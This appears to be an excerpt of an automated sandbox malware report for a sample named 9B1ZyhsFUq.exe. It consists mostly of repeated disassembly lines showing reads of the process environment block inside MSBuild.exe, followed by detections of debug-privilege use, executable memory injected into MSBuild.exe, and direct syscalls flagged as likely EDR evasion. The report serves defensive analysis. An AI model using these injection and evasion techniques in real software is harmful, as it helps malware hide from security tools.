Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011312ED mov eax, dword ptr fs:[00000030h]	8_2_011312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B7505 mov eax, dword ptr fs:[00000030h]	8_2_010B7505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B7505 mov ecx, dword ptr fs:[00000030h]	8_2_010B7505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01154500 mov eax, dword ptr fs:[00000030h]	8_2_01154500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01154500 mov eax, dword ptr fs:[00000030h]	8_2_01154500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01154500 mov eax, dword ptr fs:[00000030h]	8_2_01154500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01154500 mov eax, dword ptr fs:[00000030h]	8_2_01154500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01154500 mov eax, dword ptr fs:[00000030h]	8_2_01154500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01154500 mov eax, dword ptr fs:[00000030h]	8_2_01154500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01154500 mov eax, dword ptr fs:[00000030h]	8_2_01154500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01155537 mov eax, dword ptr fs:[00000030h]	8_2_01155537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE53E mov eax, dword ptr fs:[00000030h]	8_2_010AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE53E mov eax, dword ptr fs:[00000030h]	8_2_010AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE53E mov eax, dword ptr fs:[00000030h]	8_2_010AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE53E mov eax, dword ptr fs:[00000030h]	8_2_010AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE53E mov eax, dword ptr fs:[00000030h]	8_2_010AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112F525 mov eax, dword ptr fs:[00000030h]	8_2_0112F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112F525 mov eax, dword ptr fs:[00000030h]	8_2_0112F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112F525 mov eax, dword ptr fs:[00000030h]	8_2_0112F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112F525 mov eax, dword ptr fs:[00000030h]	8_2_0112F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112F525 mov eax, dword ptr fs:[00000030h]	8_2_0112F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112F525 mov eax, dword ptr fs:[00000030h]	8_2_0112F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0112F525 mov eax, dword ptr fs:[00000030h]	8_2_0112F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BD530 mov eax, dword ptr fs:[00000030h]	8_2_010BD530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BD530 mov eax, dword ptr fs:[00000030h]	8_2_010BD530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090535 mov eax, dword ptr fs:[00000030h]	8_2_01090535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090535 mov eax, dword ptr fs:[00000030h]	8_2_01090535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090535 mov eax, dword ptr fs:[00000030h]	8_2_01090535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090535 mov eax, dword ptr fs:[00000030h]	8_2_01090535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090535 mov eax, dword ptr fs:[00000030h]	8_2_01090535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090535 mov eax, dword ptr fs:[00000030h]	8_2_01090535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0113B52F mov eax, dword ptr fs:[00000030h]	8_2_0113B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108D534 mov eax, dword ptr fs:[00000030h]	8_2_0108D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108D534 mov eax, dword ptr fs:[00000030h]	8_2_0108D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108D534 mov eax, dword ptr fs:[00000030h]	8_2_0108D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108D534 mov eax, dword ptr fs:[00000030h]	8_2_0108D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108D534 mov eax, dword ptr fs:[00000030h]	8_2_0108D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108D534 mov eax, dword ptr fs:[00000030h]	8_2_0108D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01088550 mov eax, dword ptr fs:[00000030h]	8_2_01088550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01088550 mov eax, dword ptr fs:[00000030h]	8_2_01088550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B656A mov eax, dword ptr fs:[00000030h]	8_2_010B656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B656A mov eax, dword ptr fs:[00000030h]	8_2_010B656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B656A mov eax, dword ptr fs:[00000030h]	8_2_010B656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107B562 mov eax, dword ptr fs:[00000030h]	8_2_0107B562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BB570 mov eax, dword ptr fs:[00000030h]	8_2_010BB570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BB570 mov eax, dword ptr fs:[00000030h]	8_2_010BB570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B4588 mov eax, dword ptr fs:[00000030h]	8_2_010B4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0110B594 mov eax, dword ptr fs:[00000030h]	8_2_0110B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0110B594 mov eax, dword ptr fs:[00000030h]	8_2_0110B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107758F mov eax, dword ptr fs:[00000030h]	8_2_0107758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107758F mov eax, dword ptr fs:[00000030h]	8_2_0107758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107758F mov eax, dword ptr fs:[00000030h]	8_2_0107758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01082582 mov eax, dword ptr fs:[00000030h]	8_2_01082582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01082582 mov ecx, dword ptr fs:[00000030h]	8_2_01082582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE59C mov eax, dword ptr fs:[00000030h]	8_2_010BE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A15A9 mov eax, dword ptr fs:[00000030h]	8_2_010A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A15A9 mov eax, dword ptr fs:[00000030h]	8_2_010A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A15A9 mov eax, dword ptr fs:[00000030h]	8_2_010A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A15A9 mov eax, dword ptr fs:[00000030h]	8_2_010A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A15A9 mov eax, dword ptr fs:[00000030h]	8_2_010A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011135BA mov eax, dword ptr fs:[00000030h]	8_2_011135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011135BA mov eax, dword ptr fs:[00000030h]	8_2_011135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011135BA mov eax, dword ptr fs:[00000030h]	8_2_011135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011135BA mov eax, dword ptr fs:[00000030h]	8_2_011135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0113F5BE mov eax, dword ptr fs:[00000030h]	8_2_0113F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011005A7 mov eax, dword ptr fs:[00000030h]	8_2_011005A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011005A7 mov eax, dword ptr fs:[00000030h]	8_2_011005A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011005A7 mov eax, dword ptr fs:[00000030h]	8_2_011005A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AF5B0 mov eax, dword ptr fs:[00000030h]	8_2_010AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AF5B0 mov eax, dword ptr fs:[00000030h]	8_2_010AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AF5B0 mov eax, dword ptr fs:[00000030h]	8_2_010AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AF5B0 mov eax, dword ptr fs:[00000030h]	8_2_010AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AF5B0 mov eax, dword ptr fs:[00000030h]	8_2_010AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AF5B0 mov eax, dword ptr fs:[00000030h]	8_2_010AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AF5B0 mov eax, dword ptr fs:[00000030h]	8_2_010AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AF5B0 mov eax, dword ptr fs:[00000030h]	8_2_010AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AF5B0 mov eax, dword ptr fs:[00000030h]	8_2_010AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A45B1 mov eax, dword ptr fs:[00000030h]	8_2_010A45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A45B1 mov eax, dword ptr fs:[00000030h]	8_2_010A45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011535D7 mov eax, dword ptr fs:[00000030h]	8_2_011535D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011535D7 mov eax, dword ptr fs:[00000030h]	8_2_011535D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011535D7 mov eax, dword ptr fs:[00000030h]	8_2_011535D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE5CF mov eax, dword ptr fs:[00000030h]	8_2_010BE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE5CF mov eax, dword ptr fs:[00000030h]	8_2_010BE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B55C0 mov eax, dword ptr fs:[00000030h]	8_2_010B55C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A95DA mov eax, dword ptr fs:[00000030h]	8_2_010A95DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010865D0 mov eax, dword ptr fs:[00000030h]	8_2_010865D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BA5D0 mov eax, dword ptr fs:[00000030h]	8_2_010BA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BA5D0 mov eax, dword ptr fs:[00000030h]	8_2_010BA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_011555C9 mov eax, dword ptr fs:[00000030h]	8_2_011555C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FD5D0 mov eax, dword ptr fs:[00000030h]	8_2_010FD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010FD5D0 mov ecx, dword ptr fs:[00000030h]	8_2_010FD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BC5ED mov eax, dword ptr fs:[00000030h]	8_2_010BC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BC5ED mov eax, dword ptr fs:[00000030h]	8_2_010BC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010825E0 mov eax, dword ptr fs:[00000030h]	8_2_010825E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	8_2_010AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	8_2_010AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	8_2_010AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	8_2_010AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	8_2_010AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	8_2_010AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	8_2_010AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	8_2_010AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A15F4 mov eax, dword ptr fs:[00000030h]	8_2_010A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A15F4 mov eax, dword ptr fs:[00000030h]	8_2_010A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A15F4 mov eax, dword ptr fs:[00000030h]	8_2_010A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A15F4 mov eax, dword ptr fs:[00000030h]	8_2_010A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A15F4 mov eax, dword ptr fs:[00000030h]	8_2_010A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A15F4 mov eax, dword ptr fs:[00000030h]	8_2_010A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01107410 mov eax, dword ptr fs:[00000030h]	8_2_01107410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A340D mov eax, dword ptr fs:[00000030h]	8_2_010A340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B8402 mov eax, dword ptr fs:[00000030h]	8_2_010B8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B8402 mov eax, dword ptr fs:[00000030h]	8_2_010B8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B8402 mov eax, dword ptr fs:[00000030h]	8_2_010B8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107C427 mov eax, dword ptr fs:[00000030h]	8_2_0107C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107E420 mov eax, dword ptr fs:[00000030h]	8_2_0107E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107E420 mov eax, dword ptr fs:[00000030h]	8_2_0107E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107E420 mov eax, dword ptr fs:[00000030h]	8_2_0107E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01106420 mov eax, dword ptr fs:[00000030h]	8_2_01106420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01106420 mov eax, dword ptr fs:[00000030h]	8_2_01106420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01106420 mov eax, dword ptr fs:[00000030h]	8_2_01106420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01106420 mov eax, dword ptr fs:[00000030h]	8_2_01106420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01106420 mov eax, dword ptr fs:[00000030h]	8_2_01106420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01106420 mov eax, dword ptr fs:[00000030h]	8_2_01106420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01106420 mov eax, dword ptr fs:[00000030h]	8_2_01106420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BA430 mov eax, dword ptr fs:[00000030h]	8_2_010BA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0113F453 mov eax, dword ptr fs:[00000030h]	8_2_0113F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108B440 mov eax, dword ptr fs:[00000030h]	8_2_0108B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108B440 mov eax, dword ptr fs:[00000030h]	8_2_0108B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108B440 mov eax, dword ptr fs:[00000030h]	8_2_0108B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108B440 mov eax, dword ptr fs:[00000030h]	8_2_0108B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108B440 mov eax, dword ptr fs:[00000030h]	8_2_0108B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0108B440 mov eax, dword ptr fs:[00000030h]	8_2_0108B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE443 mov eax, dword ptr fs:[00000030h]	8_2_010BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE443 mov eax, dword ptr fs:[00000030h]	8_2_010BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE443 mov eax, dword ptr fs:[00000030h]	8_2_010BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE443 mov eax, dword ptr fs:[00000030h]	8_2_010BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE443 mov eax, dword ptr fs:[00000030h]	8_2_010BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE443 mov eax, dword ptr fs:[00000030h]	8_2_010BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE443 mov eax, dword ptr fs:[00000030h]	8_2_010BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010BE443 mov eax, dword ptr fs:[00000030h]	8_2_010BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A245A mov eax, dword ptr fs:[00000030h]	8_2_010A245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0107645D mov eax, dword ptr fs:[00000030h]	8_2_0107645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01081460 mov eax, dword ptr fs:[00000030h]	8_2_01081460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01081460 mov eax, dword ptr fs:[00000030h]	8_2_01081460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01081460 mov eax, dword ptr fs:[00000030h]	8_2_01081460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01081460 mov eax, dword ptr fs:[00000030h]	8_2_01081460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01081460 mov eax, dword ptr fs:[00000030h]	8_2_01081460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109F460 mov eax, dword ptr fs:[00000030h]	8_2_0109F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109F460 mov eax, dword ptr fs:[00000030h]	8_2_0109F460

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtOpenKeyEx: Direct from: 0x77672B9C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtProtectVirtualMemory: Direct from: 0x77672F9C	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtCreateFile: Direct from: 0x77672FEC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtOpenFile: Direct from: 0x77672DCC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtTerminateThread: Direct from: 0x77672FCC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtProtectVirtualMemory: Direct from: 0x77667B2E	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQueryInformationToken: Direct from: 0x77672CAC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtAllocateVirtualMemory: Direct from: 0x77672BEC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtDeviceIoControlFile: Direct from: 0x77672AEC	Jump to behavior
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	NtQuerySystemInformation: Direct from: 0x776748CC	Jump to behavior
